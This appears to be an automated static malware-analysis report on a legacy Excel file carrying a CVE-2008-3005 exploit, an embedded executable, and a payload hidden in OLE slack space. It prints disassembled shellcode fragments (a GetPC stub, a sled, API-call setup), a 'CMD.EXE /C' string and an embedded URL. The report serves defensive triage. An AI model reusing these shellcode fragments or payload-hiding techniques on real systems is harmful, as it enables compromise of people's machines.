MALICIOUS
342
Risk Score
Heuristics 9
-
Excel Index Array exploit — CVE-2008-3005 critical CVE likely CVE_2008_3005Legacy Excel workbook has the CVE-2008-3005 exploit shape: a compact BIFF8 FORMAT-index cluster paired with a normal XF table and a large unallocated OLE slack region used to stage the payload. The FORMAT pattern alone is not sufficient, so the rule requires the OLE slack payload-hiding context to keep false positives low.
-
Embedded PE executable critical OLE_EMBEDDED_EXEMZ/PE header found inside document — possible embedded executable
-
x86 GetPC stub (CALL $+5; POP EAX) high SC_GETPC_CALLx86 GetPC stub (CALL $+5; POP EAX)
Disassembly
x86 disassembly · validity: code (0.96) — 7/7 branch targets land on an instruction boundary (100% coherence)00003901 e800000000 call 0x3906 00003906 58 pop eax 00003907 83c005 add eax, 5 0000390A c3 ret 0000390B f3a4 rep movsb byte ptr es:[edi], byte ptr [esi] 0000390D 33c0 xor eax, eax 0000390F 8bcb mov ecx, ebx 00003911 f3aa rep stosb byte ptr es:[edi], al 00003913 6a00 push 0 00003915 52 push edx 00003916 ffd5 call ebp 00003918 8b4f14 mov ecx, dword ptr [edi + 0x14] 0000391B 8b07 mov eax, dword ptr [edi] 0000391D 8bd0 mov edx, eax 0000391F 03d1 add edx, ecx 00003921 8b5f10 mov ebx, dword ptr [edi + 0x10] 00003924 03d9 add ebx, ecx 00003926 2bda sub ebx, edx 00003928 8b6e18 mov ebp, dword ptr [esi + 0x18] 0000392B ff561c call dword ptr [esi + 0x1c] 0000392E 8bd0 mov edx, eax 00003930 8b7710 mov esi, dword ptr [edi + 0x10] 00003933 8b3f mov edi, dword ptr [edi] 00003935 ffe4 jmp esp 00003937 8b561c mov edx, dword ptr [esi + 0x1c] 0000393A 83c203 add edx, 3 0000393D 52 push edx 0000393E 52 push edx 0000393F 52 push edx 00003940 52 push edx 00003941 6a00 push 0 00003943 6880000000 push 0x80 00003948 6a04 push 4 0000394A 6a00 push 0 0000394C 6a01 push 1 0000394E 68000000c0 push 0xc0000000 00003953 50 push eax 00003954 52 push edx 00003955 8d16 lea edx, [esi] 00003957 ff22 jmp dword ptr [edx] 00003959 8b5614 mov edx, dword ptr [esi + 0x14] 0000395C 8b461c mov eax, dword ptr [esi + 0x1c] 0000395F 6a00 push 0
-
Reference to CreateProcess API high SC_STR_CREATEPROCESSReference to CreateProcess API
-
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 212,806 bytes but its declared streams total only 12,288 bytes — 200,518 bytes (94%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x61 bytes
Disassembly
x86 disassembly · validity: uncertain (0.586) — 3/8 branch targets land on an instruction boundary (38% coherence)000039F4 61 popal 000039F5 61 popal 000039F6 61 popal 000039F7 61 popal 000039F8 61 popal 000039F9 61 popal 000039FA 61 popal 000039FB 61 popal 000039FC 61 popal 000039FD 61 popal 000039FE 61 popal 000039FF 61 popal 00003A00 61 popal 00003A01 61 popal 00003A02 61 popal 00003A03 61 popal 00003A04 61 popal 00003A05 61 popal 00003A06 61 popal 00003A07 61 popal 00003A08 61 popal 00003A09 61 popal 00003A0A 61 popal 00003A0B 61 popal 00003A0C 61 popal 00003A0D 61 popal 00003A0E 61 popal 00003A0F 61 popal 00003A10 61 popal 00003A11 61 popal 00003A12 61 popal 00003A13 61 popal 00003A14 61 popal 00003A15 61 popal 00003A16 61 popal 00003A17 91 xchg ecx, eax 00003A18 61 popal 00003A19 61 popal 00003A1A 7e6f jle 0x3a8b 00003A1C 6f outsd dx, dword ptr [esi] 00003A1D dbd5 fcmovnbe st(0), st(5) 00003A1F 61 popal 00003A20 ac lodsb al, byte ptr [esi] 00003A21 68d9402d60 push 0x602d40d9 00003A26 40 inc eax 00003A27 ac lodsb al, byte ptr [esi] 00003A28 093512081141 or dword ptr [0x41110812], esi 00003A2E 0e push cs 00003A2F 1313 adc edx, dword ptr [ebx] 00003A31 06 push es 00003A32 0c00 or al, 0 00003A34 02410f add al, byte ptr [ecx + 0xf] 00003A37 000e add byte ptr [esi], cl 00003A39 0f411504031341 cmovno edx, dword ptr [0x41130304] 00003A40 0f1408 unpcklps xmm1, xmmword ptr [eax] 00003A43 41 inc ecx 00003A44 41 inc ecx 00003A45 0f2e2541320e0c ucomiss xmm4, dword ptr [0xc0e3241] 00003A4C 0405 add al, 5 00003A4E 6c insb byte ptr es:[edi], dx 00003A4F 4f dec edi 00003A50 6b .byte 0x6b 00003A51 6c insb byte ptr es:[edi], dx 00003A52 61 popal 00003A53 45 inc ebp
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.tcm-mice.com.tw/frango In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
embedded_office_0000708a.exe |
embedded-pe | Office MZ+PE at offset 0x708A | 183996 bytes |
SHA-256: 85d6ff5f9502893d6333ba9b0453ca3e5ba7ae6696e509e48f52048e66c018d5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Static shellcode analysis recovered command string(s): CMD.EXE /C
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.